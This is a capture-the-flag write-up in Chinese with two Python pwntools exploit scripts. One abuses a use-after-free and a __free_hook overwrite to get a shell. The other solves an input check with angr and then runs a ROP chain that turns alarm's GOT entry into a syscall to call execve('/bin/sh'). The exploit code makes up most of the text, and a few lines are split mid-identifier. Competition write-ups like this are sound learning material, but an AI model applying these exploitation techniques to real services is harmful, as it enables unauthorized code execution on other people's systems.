Pwn
CPP
解题思路
题目存在uaf,结合堆风水getshell
#!/usr/bin/python
#coding:utf-8
# Solve script for the "CPP" challenge described in the write-up above.
# NOTE(review): this is Python 2 code -- further down `range(0x420/0x20+2)` relies
# on integer `/`, and str/bytes are mixed freely (`ljust(8,'\x00')` on recv data);
# it will not run unmodified under Python 3.
from pwn import *
context.log_level='debug'  # echo every byte sent and received
#io=process("./chall",env={"LD_PRELOAD":"./libc-2.31.so"})  # local variant, disabled
io=remote('124.70.12.210', 10002)  # challenge instance used in the write-up
libc=ELF("./libc-2.31.so")  # hook symbol offsets are read from this specific libc build
# Send `a` (stringified) as one line once the ">" prompt has arrived.
sla=lambda a : io.sendlineafter(">",str(a))
# Hand the connection over to the terminal.
ia =lambda : io.interactive()
def add(idx):
    """Menu option 0: allocate a chunk whose content is "/bin/sh".

    NOTE(review): the `idx` parameter is never used. The index line sends the
    module-level name `i` (the loop variable later in the file), so a call such as
    `add(2)` actually sends whatever `i` last held. Left unchanged here because
    the later steps of the write-up may depend on that behaviour.
    """
    sla(0)  # choice
    sla("/bin/sh")  # chunk content
    sla(i)  # index -- reads the global `i`, not `idx`
def dele(idx,ct='a'):
    """Menu option 1: select chunk `idx`, then send `ct` (default 'a') as the next line.

    The original comment labelled `ct` as "index"; judging from the call sites
    below it is the data line sent after the index (e.g. a packed address).
    """
    sla(1)  # choice
    sla(idx)  # index
    sla(ct)  # data line sent after the index
#gdb.attach(io,'b *{}+0x0000555555554000'.format(0x13dd))  # debugger hook, disabled
# 0x420/0x20 + 2 == 35 under Python 2 integer division: allocate that many chunks
# up front (the heap grooming the write-up calls 堆风水).
for i in range(0x420/0x20+2):
    add(i)
sla(1)#choice
sla(1)
heap_base=u64(io.recvuntil("\x0a")[-7:-1].ljust(8,'\x00'))-0x470+0x20
log.success("heap_base==>"+hex(heap_base))
sla('a')
fake_heap=heap_base+8
fake_heap=p32((fake_heap)&0xffffffff)+p8((fake_heap>>32)&0xff)+p8((fake_he
ap>>40)&0xff)
dele(2,'a')
dele(3,fake_heap)
sla(0)
sla("aaaa")
sla(1)
sla(0)
sla(p16(0x421))
sla(2)
sla(1)#choice
sla(0)
libc_base=u64(io.recvuntil("\x7f")[-6:].ljust(8,'\x00'))-0x1ebbe0
log.success("libc_base==>"+hex(libc_base))
sla('a')
malloc_hook=libc_base+libc.sym["__malloc_hook"]
free_hook=libc_base+libc.sym["__free_hook"]
malloc_hook=p32((malloc_hook)&0xffffffff)+p8((malloc_hook>>32)&0xff)+p8((m
alloc_hook>>40)&0xff)
free_hook=p32((free_hook)&0xffffffff)+p8((free_hook>>32)&0xff)+p8((free_ho
ok>>40)&0xff)
dele(5)
dele(6)
dele(7)
dele(8,free_hook)
sla(0)
sla(p16(0x421))
sla(5)
sla(0)
#gdb.attach(io)
system=0x55470+libc_base
libc_print=(0x271b0+libc_base)
#gdb.attach(io,'b *{}'.format(system))
sla(p64(system-0x60))
sla(255)
ia()
#0x5555555582e0
game
解题思路
前面是AEG,利用angr自动化解出后,可以栈溢出,利用rop部分覆写got表为syscall即可利用read读取相应字节的字符设置rax,ret2syscall
# Solve script for the "game" challenge described in the write-up above.
# NOTE(review): Python 2 style -- `find("\x5F\xC3")` on the bytes of a binary
# read and the `binary[num+5]+binary[num+6]` concatenation in rop() assume
# str == bytes; the script will not run unmodified under Python 3.
from pwn import *
import base64,time,os
import angr  # third-party symbolic-execution engine, used by main() to solve the "input code"
import claripy
p = remote("121.36.21.113", 10004)  # challenge instance used in the write-up
x=time.time()  # start timestamp; main() prints the elapsed time against it
context.log_level = 'debug'
def rop():
    """Second stage: build the stack payload from "./1" and drive the remote to a shell.

    Reads gadget addresses and the buffer size out of the downloaded binary
    (written by main()), sends the payload, then two follow-up inputs with fixed
    1-second sleeps, and finally hands the connection over. Uses the module-level
    connection `p`.

    NOTE(review): the file handle `f` is never closed (no `with` / `close()`), and
    `atoi_got` / `alarm_plt` are assigned but unused.
    """
    f = open("./1", 'rb+')
    binary = f.read()
    # Byte pattern 5F C3 ("pop rdi; ret"); 0x400000 is assumed to be the load base.
    pop_rdi = 0x400000+binary.find("\x5F\xC3")
    pop_rsi = pop_rdi-2  # presumably the "pop rsi; pop r15; ret" just before it -- confirm
    read_plt = 0x400560  # same address main() hands to angr as its `find` target
    alarm_got = 0x601018
    atoi_got = 0x601038  # unused
    alarm_plt = 0x400550  # unused
    # Two gadgets located relative to pop_rdi; the offsets look like the
    # __libc_csu_init pop/call pair -- TODO confirm against the binary.
    init = pop_rdi-9
    init2 = pop_rdi-0x23
    def call_(rbx,rbp,r12,r13,r14,r15):
        # Chain: load six registers through `init`, then continue at `init2`.
        return p64(init)+p64(rbx)+p64(rbp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)+p64(init2)
    # Locate the byte sequence 75 29 48 8D 85 and read the two bytes after it as a
    # 16-bit displacement; num = 0x10000 - disp (presumably the buffer's offset
    # below rbp, taken from an `lea rax,[rbp-N]` encoding -- confirm).
    num = binary.find("\x75\x29\x48\x8d\x85")
    num = 0x10000-u16(binary[num+5]+binary[num+6])
    log.info(hex(num))
    # num+8 bytes of padding, then: read_plt with rdi=0, rsi=alarm_got;
    # read_plt again with rsi=0x601500; then call_() with r12=alarm_got, r15=0x601500.
    payload = 'a'*(num+8)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(alarm_got)+p64(0)+p64(read_plt)+p64(pop_rsi)+p64(0x601500)+p64(0)+p64(read_plt)
    payload += call_(0,1,alarm_got,0,0,0x601500)
    #gdb.attach(p, 'b*0x40081c')
    p.send(payload)
    time.sleep(1)  # fixed delays instead of waiting on output; fragile on a slow link
    p.send("\x85")  # a single byte, consumed by the first read() in the chain
    time.sleep(1)
    p.send("/bin/sh".ljust(59, '\x00'))  # 59 bytes, consumed by the second read()
    p.sendline("cat flag")
    p.interactive()
def main():
    """First stage: fetch the challenge binary, solve its input check with angr, then call rop().

    Flow: read the base64 blob that follows the "data info" banner, write it to
    ./1, build a 10-byte symbolic argv[1] constrained to ASCII digits, explore
    until address 0x400560 is reached, send the concrete solution after the
    "input code:" prompt, and hand over to rop().

    NOTE(review): `os.system("rm 1")` and `os.system("chmod 777 ./1")` shell out
    for operations the stdlib covers directly (`os.remove`, `os.chmod`); the
    arguments are fixed literals, so this is a style point rather than an
    injection risk. `sm.found[0]` raises IndexError if angr finds no path.
    """
    p.recvuntil("------------------data info------------------\n")
    data = p.recvuntil('\n', drop = True)  # one line of base64-encoded binary
    os.system("rm 1")  # discard any stale copy from a previous run
    f = open("./1", 'wb+')
    f.write(base64.b64decode(data))
    f.close()
    os.system("chmod 777 ./1")  # NOTE(review): world-writable; a read/execute mode would do
    project = angr.Project("./1")
    argv1 = claripy.BVS("argv1",10*8)  # 10 symbolic bytes for argv[1]
    st = project.factory.entry_state(args=["./1",argv1])
    for byt in argv1.chop(8):
        # Restrict every byte of argv[1] to '0'..'9'.
        st.add_constraints(st.solver.And(byt >= ord('0'),byt <= ord('9')))
    sm = project.factory.simulation_manager(st)
    sm.one_active.options.add(angr.options.LAZY_SOLVES)
    sm.explore(find=0x400560)  # same address rop() uses as read_plt
    result = sm.found[0].solver.eval(argv1, cast_to=bytes)
    print(result)
    y=time.time()
    print("----------------------%f------------------------------"%(y-x))  # seconds since module-level `x`
    p.sendlineafter("input code:", result)
    rop()
# Run the two-stage flow only when executed as a script.
if __name__ == '__main__':
    main()